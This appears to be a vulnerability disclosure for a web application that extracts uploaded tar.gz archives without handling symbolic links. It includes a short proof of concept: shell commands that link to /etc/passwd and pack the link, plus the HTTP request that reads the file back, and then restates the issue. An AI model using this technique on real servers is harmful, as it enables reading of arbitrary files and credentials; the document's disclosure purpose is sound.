When compressing files, the handling of file soft links was not taken into account. An attacker can create a malicious file file1 as a soft link pointing to the target file file2, then package this soft link file into a tar.gz file and upload it. Subsequently, when accessing the decompressed file from the server, this file file1 will point to the target file file2 on the victim server.
ln -s /etc/passwd ff2425
tar -czf archive.tar.gz ff2425
Upload the tar.gz file.
after uploads we can see the path
GET /file=private_upload/default_user/2024-12-23-17-26-13/archive.tar.gz.extract/ff2425 HTTP/1.1
Host: 192.168.137.14:53583
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.137.14:53583/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: js_darkmode_cookie=True
Connection: keep-alive
Due to the existence of this vulnerability, all files on the server can be read in this way, which seriously affects data confidentiality.
Summary
When compressing files, the handling of file soft links was not taken into account. An attacker can create a malicious file file1 as a soft link pointing to the target file file2, then package this soft link file into a tar.gz file and upload it. Subsequently, when accessing the decompressed file from the server, this file file1 will point to the target file file2 on the victim server.
Details
1 Create a soft link file pointing to the target
2 Create a tar.gz file
Upload the tar.gz file.
after uploads we can see the path
now access the file path
Impact:
Due to the existence of this vulnerability, all files on the server can be read in this way, which seriously affects data confidentiality.